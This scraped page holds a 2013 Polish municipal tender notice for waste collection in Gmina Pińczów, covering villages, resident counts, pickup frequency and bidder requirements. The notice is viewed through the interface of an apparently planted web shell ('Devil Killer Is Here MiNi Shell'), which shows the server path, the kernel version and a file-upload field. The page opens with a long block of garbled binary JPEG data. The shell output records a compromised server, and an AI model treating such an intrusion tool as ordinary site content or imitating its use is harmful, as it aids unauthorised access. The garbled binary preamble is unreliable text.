JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130514/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130514/75841-N-2013.html

<p class="kh_header"><b>Pińczów: Odbiór odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie Gminy Pińczów oraz ich zagospodarowanie - Sektor II Gmina</b><br>
<b>Numer ogłoszenia: 75841 - 2013; data zamieszczenia: 14.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pińczów , ul. 3 Maja 10, 28-400 Pińczów, woj. świętokrzyskie, tel. 41 3573871 do 75, faks 41 3572645.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pinczow.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie Gminy Pińczów oraz ich zagospodarowanie - Sektor II Gmina.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na odbiorze i zagospodarowaniu odpadów komunalnych w Sektorze II. W wyniku podpisanej umowy Wykonawca w cenie ryczałtowej wykona kompleksową usługę odbioru i zagospodarowania (odzysk lub unieszkodliwianie) odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie Gminy Pińczów obejmującej  Oś. Robotnicze Gacki i 41 sołectw: Aleksandrów, Bogucice Pierwsze, Bogucice Drugie, Borków, Brzeście, Bugaj, Byczów, Chrabków, Chruścice, Chwałowice, Gacki, Grochowiska, Kopernia, Kowala, Kozubów, Krzyżanowice Dolne, Krzyżanowice Średnie, Leszcze, Marzęcin, Młodzawy Duże, Młodzawy Małe, Mozgawa, Orkanów, Pasturka, Podłężę, Sadek, Skowronno Dolne, Skowronno Górne, Skrzypiów, Szarbków, Szczypiec, Uników, Winiary, Włochy, Wola Zagojska Dolna, Wola Zagojska Górna, Zagorzyce, Stara Zagość, Zakrzów, Zawarża, Nowa Zagość
	Powierzchnia Gminy Pińczów wynosi 198,42 km2.
Liczba mieszkańców: Przyjmuje się, że docelowo systemem zostanie objętych szacunkowo ok. 10 000 mieszkańców, w tym:
- zamieszkałych w zabudowie jednorodzinnej - 9 474
- zamieszkałych w zabudowie wielorodzinnej - 780
Rodzaj zabudowy
     - budynki jednorodzinne - 2 431
     - budynki wielorodzinne - 40
Dane dot. liczby nieruchomości oraz mieszkańców, zawarte w opracowaniu, są aktualne na dzień 31 grudnia 2012 r., natomiast dane dot. ilości odpadów są danymi szacunkowymi i mają służyć Wykonawcy do oszacowania wartości zamówienia i złożenia oferty.
Wykaz sołectw wraz z orientacyjną liczbą mieszkańców objętych odbiorem i zagospodarowaniem odpadów komunalnych
L.p.	Nazwa sołectwa	Liczba mieszkańców	Liczba domów
1.	Aleksandrów	103	26
2.	Bogucice Drugie, ul. Szosa
Bogucice Drugie, ul. Zakamień
Bogucice Pierwsze, ul. Parcela
Bogucice Pierwsze, ul Skałki
Bogucice Pierwsze , ul. Stara Wieś
Bogucice Pierwsze, ul Zakościele	209
60
92
110
188
124	61
17
28
28
47
32
3.	Borków	71	21
4.	Brzeście	598	157
5.	Bugaj	28	10
6.	Byczów	69	27
7.	Chrabków	115	31
8.	Chruścice	262	49
9.	Chwałowice	80	23
10.	Gacki	82	19
11.	Gacki Osiedle Robotnicze	638	35
12.	Grochowiska	52	12
13.	Kopernia	320	75
14.	Kowala	204	46
15.	Kozubów	405	108
16.	Krzyżanowice Dolne	169	40
17.	Krzyżanowice Średnie	191	44
18.	Leszcze	386	87
19.	Marzęcin	262	62
20.	Młodzawy Duże	566	156
21	Młodzawy Małe	167	41
22.	Mozgawa	190	53
23.	Nowa Zagość	164	37
24.	Orkanów	138	38
25.	Pasturka	438	110
26.	Podłęże	316	80
27.	Sadek	205	53
28.	Skowronno Dolne	257	68
29.	Skowronno Górne	121	34
30.	Skrzypiów	369	103
31.	Stara Zagość	359	86
32.	Szarbków	242	62
33.	Szczypiec	123	27
34.	Uników	311	81
35.	Winiary	221	47
36.	Włochy	305	91
37.	Wola Zagojska Dolna	245	58
38.	Wola Zagojska Górna	145	25
39.	Zagorzyce	226	52
40.	Zakrzów	200	51
41.	Zawarża	128	33


	 2.3. Szczegółowy opis przedmioty zamówienia
	GROMADZENIE ODPADÓW:
1) Wyposażenie nieruchomości w odpowiednią i właściwą ilość pojemników oraz ich dezynfekcja należy do właściciela nieruchomości, ale Zamawiający wymaga od Wykonawcy usługi, w przypadku, gdy właściciel nieruchomości będzie zainteresowany i zgłosi taką potrzebę zaopatrzenia nieruchomości w odpowiednie pojemniki do zbierania odpadów komunalnych, na zasadzie odrębnie i wzajemnie ustalonych warunków między właścicielem nieruchomości a Wykonawcą (umowa sprzedaży, dzierżawy, najmu, użyczenia). Zamawiający nie będzie ponosił z tego tytułu żadnych należności.
2) 	Właściciele nieruchomości będą gromadzić odpady w następujących rodzajach pojemników:
	- pojemniki na odpady komunalne o pojemności 80 l,110 l, 240 l, 1100 l;
	- worki na odpady o pojemności 80 l, 110 l, 120 l;
	- pojemniki na odpady (KP 5, KP 7, KP 10) o pojemności od 5m3 do 10m3,
	Kolorystyka pojemników/worków do selektywnej zbiórki:
-	kolor niebieski lub żółty przeznaczone do zbierania papieru i tektury, tworzyw sztucznych, opakowań wielomateriałowych i metali, szkła  (odpadów suchych) 
	- 	kolor brązowy przeznaczony do zbierania odpadów mokrych (bioodpadów)
CZĘSTOTLIWOŚĆ ODBIORU ODPADÓW
1) Odbiór odpadów komunalnych zmieszanych, ma być prowadzony w sposób niedopuszczający do ich zalegania w pojemnikach, z częstotliwością opróżniania pojemników nie rzadziej niż: 
	a) w zabudowie wielorodzinnej - dwa razy w tygodniu,
	b) w zabudowie jednorodzinnej - jeden raz na miesiąc.
2)	Odbiór odpadów selektywnie zbieranych w systemie u źródła takich, jak: papier tektura, tworzywa sztuczne i opakowania wielomateriałowe, szkło, metal, odpady zielone i ulegające biodegradacji, z częstotliwością nie rzadziej niż:
	a) w zabudowie wielorodzinnej - dwa razy w tygodniu,
	b) w zabudowie jednorodzinnej - jeden raz w miesiącu.
3)	W przypadku terenów zabudowy wielorodzinnej w okresie przed świętami Bożego Narodzenia, Wielkanocy, Wykonawca zobowiązany jest do zwiększenia częstotliwości ich odbioru i dostosowania go do chwilowych potrzeb. Zamawiający zastrzega sobie możliwość w okresach wzmożonego powstawania odpadów, do zlecania wywozów dodatkowych na zgłoszenie telefoniczne, faxem, mailem. Czas reakcji na zgłoszenie telefoniczne maksymalnie do 6 godzin od zgłoszenia.
 HARMONOGRAM ODBIORU ODPADÓW
1) Odbiór odpadów, będący przedmiotem niniejszego zamówienia, odbywać się będzie zgodnie ze sporządzonym przez Wykonawcę harmonogramem odbioru odpadów. Harmonogram zostanie sporządzony przez Wykonawcę na podstawie danych zawartych w niniejszej SIWZ i informacji zdobytych przez Wykonawcę zgodnie  z  pkt. 14 dotyczącym opisu sposobu przygotowania oferty,  litera A. Wymagania ogólne,  ppkt4) SIWZ.
2)	Wykonawca zobowiązany jest do dostarczenia, celem zatwierdzenia przez Zamawiającego, w terminie 14 dni przed rozpoczęciem realizacji zamówienia, szczegółowego harmonogramu odbioru odpadów.
3)	Harmonogram odbioru odpadów komunalnych z nieruchomości zamieszkałych przez mieszkańców zostanie sporządzony zgodnie z Regulaminem utrzymania czystości i porządku na terenie Gminy Pińczów i wymogami niniejszej SIWZ, w formie pisemnej i zostanie dostarczony przez Wykonawcę Sołtysom i Radzie Osiedla, zostanie umieszczony na stronie internetowej Wykonawcy i Zamawiającego oraz na tablicy ogłoszeń w poszczególnych sołectwach, nie później niż 7 dni przed rozpoczęciem odbioru odpadów.
4) W wyjątkowych sytuacjach Wykonawca, na zgłoszenie Zamawiającego, ma obowiązek odbierania odpadów poza ustalonym w harmonogramie terminie, jeżeli odpady te zostały zebrane i zgromadzone na terenie nieruchomości w terminach innych niż przewiduje harmonogram odbioru odpadów, a zagraża to bezpieczeństwu życia i zdrowia mieszkańców.
 ODBIÓR ODPADÓW
1) 	Wykonawca zapewni odbiór i zagospodarowanie odpadów komunalnych w sposób zapewniający właściwy stan sanitarno - porządkowy na terenie nieruchomości. Z budynków zabudowy wielorodzinnej odpady komunalne będą odbierane bezpośrednio z altan śmietnikowych i miejsc ich gromadzenia, natomiast z budynków jednorodzinnych z terenu przy posesji.
2)	Wykonawca zobowiązany jest do:
a) 	dokonania odbioru i transportu odpadów, również w przypadkach, kiedy dojazd do nieruchomości będzie utrudniony z powodu prowadzonych remontów dróg, opadów atmosferycznych itp. W takich przypadkach Wykonawcy nie przysługują roszczenia z tytułu wzrostu kosztów realizacji przedmiotu umowy.
b)	Zgłaszania każdorazowo Zamawiającemu wszelkich nieprawidłowości w wykonywaniu usługi (brak lub niewłaściwa segregacja odpadów, brak dostępu do pojemników, zamknięta brama itp.) drogą mailową lub faksem.
c)	Porządkowania terenu zanieczyszczonego odpadami i innymi zanieczyszczeniami wysypanymi z pojemników, kontenerów, worków i pojazdów w trakcie realizacji usługi wywozu.
d)	naprawiania i ponoszenia kosztów naprawy szkód wyrządzonych podczas wykonywania wywozu odpadów komunalnych (uszkodzenia chodników osiedlowych, punktów do składowania odpadów, uszkodzenia lub zniszczenia pojemników itp.) za szkody w majątku Zamawiającego lub osób trzecich spowodowane w trakcie odbioru odpadów odpowiedzialność ponosi Wykonawca.
e)	Wyposażenia własnych pracowników zajmujących się wywozem odpadów w odzież ochronną z widocznym logo formy, w kamizelki z elementami odblaskowymi oraz w identyfikatory.
TRANSPORT ODPADÓW KOMUNALNYCH
1) 	Zakaz mieszania selektywnie zebranych odpadów komunalnych ze zmieszanymi odpadami komunalnymi odbieranymi od właścicieli nieruchomości zamieszkałych,
2) Zakaz odbioru odpadów w niedziele oraz dni ustawowo wolne od pracy. W przypadku, gdy dzień odbioru przypada w dzień ustawowo wolny od pracy, dniem odbioru odpadów są dwa dni robocze następujące po dniu wolnym,
3) 	Zabezpieczenie przewożonych odpadów przed wysypywaniem na drogę.
4) Wszystkie pojazdy będące w dyspozycji Wykonawcy, winny być trwale i czytelnie oznakowane (nazwa firmy, dane adresowe i numery telefonu), winny być zarejestrowane, dopuszczone do ruchu, posiadać aktualne badania techniczne i świadectwa dopuszczenia do ruchu. Zamawiający wymaga dodatkowego oznakowania pojazdu napisem odpady zmieszane w przypadku pojazdu odbierającego zmieszane odpady komunalne, odpady segregowane w przypadku pojazdu odbierającego odpady zebrane w sposób selektywny.
 SPRAWOZDAWCZOŚĆ
1) Odzysk lub unieszkodliwianie zebranych odpadów komunalnych z nieruchomości zamieszkałych przez mieszkańców:
a)	Wykonawca zobowiązany jest do osiągnięcia w danym roku kalendarzowym w odniesieniu do masy odebranych przez siebie odpadów komunalnych poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami papieru, metalu, tworzyw sztucznych, szkła  zgodnie z rozporządzeniem Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych  
b) Wykonawca zobowiązany jest do osiągnięcia w danym roku kalendarzowym w odniesieniu do masy odebranych przez siebie odpadów komunalnych poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania zgodnie z rozporządzeniem Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczenia masy tych odpadów.
2) Wykonawca jest zobowiązany do:
a) sporządzania kwartalnych sprawozdań, zgodnie ze wzorem określonym w rozporządzeniu Ministra Środowiska z dnia 15 maja 2012 r. w sprawie wzoru sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi i przekazywania Burmistrzowi Miasta i Gminy Pińczów w terminie do końca miesiąca następującego po kwartale, którego dotyczy,
b) dostarczania Zamawiającemu zestawienia raportów wagowych i kart przekazania odpadów, w terminie do 7 dni po zakończeniu każdego miesiąca  wraz z fakturą. 
3)	Wykonawca ma obowiązek prowadzić dokumentację związaną z działalnością objętą zamówieniem, w tym:
a) 	bieżące prowadzenie ewidencji odpadów odbieranych od właścicieli nieruchomości zamieszkałych oraz wymaganej prawem sprawozdawczości,
b) bieżące prowadzenie ewidencji jakościowej - morfologia odpadów, uwzględniającej również masą odbieranych odpadów oraz ich gęstość nasypową.
4) Przekazywanie Zamawiającemu kwartalnych sprawozdań dotyczących:
a) 	masy poszczególnych rodzajów odpadów,
b)	masy odpadów ulegających biodegradacji,
c)	właścicieli lub zarządów nieruchomości zamieszkałych, od których odebrano odpady komunalne, wraz z podaniem liczby pojemników z odpadami odebranymi z terenu nieruchomości,
d) właścicieli nieruchomości lub zarządów nieruchomości zamieszkałych, którzy zbierają odpady komunalne w sposób niezgodny z regulaminem.
5)	Ponadto Wykonawca zobowiązany jest do przedkładania kwartalnej informacji o masie poszczególnych rodzajów odpadów (z podaniem kodów odpadów zgodnie z obowiązującą klasyfikacją), stanowiących pozostałość po przerobie odebranych zmieszanych odpadów komunalnych, kierowaną do składowania wraz z podaniem instalacji, do której zostały one przekazane. Informacja ta ma być składana do końca miesiąca po upływie kwartału, którego dotyczy.
INNE OBOWIĄZKI
1) Współudział w edukacji mieszkańców, w tym dystrybucja dokumentów związanych z Systemem Gospodarki Odpadami Komunalnymi w Gminie Pińczów, o ile nie wymagają one potwierdzenia odbioru,
2) Wykonanie przedmiotu umowy w sposób fachowych, niepowodujący niepotrzebnych przeszkód oraz ograniczających niedogodności dla mieszkańców Gminy Pińczów do niezbędnego minimum;
3)	Zapewnienie, dla właściwej realizacji przedmiotu umowy, przez cały czas trwania umowy dostatecznej liczby środków technicznych, gwarantujących terminowe i jakościowe wykonanie zakresu rzeczowego usługi, co najmniej takiej, jak w złożonej w postępowaniu przetargowym ofercie;
4) Ponoszenie pełnej odpowiedzialności za należyte wykonanie powierzonych czynności zgodnie z obowiązującymi przepisami i normami;
5) 	Okazanie na żądanie Zamawiającego wszelkich dokumentów potwierdzających wykonanie przedmiotu umowy zgodnie z określonymi przez Zamawiającego wymaganiami i przepisami prawa;
6) Ponoszenie pełnej odpowiedzialności wobec Zamawiającego i osób trzecich za szkody na mieniu i zdrowiu osób trzecich, powstałe podczas i w związku z realizacją przedmiotu umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.31.00-7, 90.51.10.00-2, 90.51.20.00-9, 90.51.12.00-4, 50.90.00.00-2, 90.53.30.00-2, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany wnieść wadium w wysokości 20 000,00zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art.22 ust.1 ustawy, o udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące:
	a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
	b)  posiadania wiedzy i doświadczenia;
	c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
	d)  sytuacji ekonomicznej i finansowej.
2) Zamawiający ustala następujące, szczegółowe warunki udziału w postępowaniu:
	a) Posiadanie uprawnień  do wykonywania określonej działalności lub czynności  potwierdzone:
- zaświadczeniem o wpisie do rejestru działalności regulowanej (prowadzonego przez Burmistrza Miasta i Gminy Pińczów) w zakresie odbioru odpadów komunalnych od właścicieli nieruchomości zamieszkałych,
- zezwoleniem Starosty Pińczowskiego na zbieranie i  transport odpadów komunalnych,
- licencją na prowadzenie krajowego transportu drogowego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b)Posiadanie wiedzy i doświadczenia w wykonywaniu podobnych usług potwierdzone, że w okresie ostatnich 3 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonywał, a w przypadku świadczeń okresowych lub ciągłych wykonuje usługi odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia, w ramach których odbierał odpady komunalne zmieszane z terenu nieruchomości w ilości co najmniej 1 000 Mgrok oraz odpady komunalne gromadzone selektywnie (np. papier, szkło, plastik) w ilości co najmniej 50 Mgrok</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują co najmniej:
     -	dwoma pojazdami przystosowanymi do odbierania odpadów komunalnych zmieszanych (  śmieciarki),
     - 	dwoma pojazdami przystosowanymi do odbioru selektywnie zebranych odpadów
     -	jednym pojazdem do odbierania odpadów bez funkcji kompaktującej.
    	Wszystkie pojazdy powinny spełniać wymagania określone przepisami ustawy prawo o ruchu  drogowym.  
	Pojazdy te powinny umożliwiać odbiór i transport odpadów gromadzonych, jako zmieszane i selektywnie gromadzone w następujących pojemnikach:
     - pojemniki na odpady komunalne: 80 l, 110 l, 240 l, 1100 l,
     - worki na odpady o pojemności: 80 l, 110 l, 120 l,
     - pojemniki (kontenery) o pojemności od 5 do 10m3.
     Pojazdy te powinny być we właściwym stanie technicznym, oznaczone widocznym logo, numerem telefonu Wykonawcy oraz wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu składania odpadów po opróżnieniu pojemników np. miotła, łopata. Oznakowanie pojazdu winno jednoznacznie stwierdzać jaki rodzaj odpadów będzie odbierany, odpady zmieszane (niesegregowane) czy  odpady selektywnie zebrane.
	d)  Dysponują bazą magazynowo - transportową na terenie Gminy Pińczów lub w odległości nie większej niż 60 km od granicy Gminy Pińczów, zlokalizowaną na terenie, do którego Wykonawca posiada tytuł prawny, spełniającą wymogi określone w rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 25 stycznia 2013 r., poz.122).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdowanie się w odpowiedniej sytuacji ekonomicznej i finansowej polegającej na posiadaniu ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia (dla przedmiotowego kontraktu) na kwotę nie mniejszą niż 250 000 zł oraz posiadaniu środków finansowych lub zdolności kredytowej w wysokości nie mniejszej niż 200 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
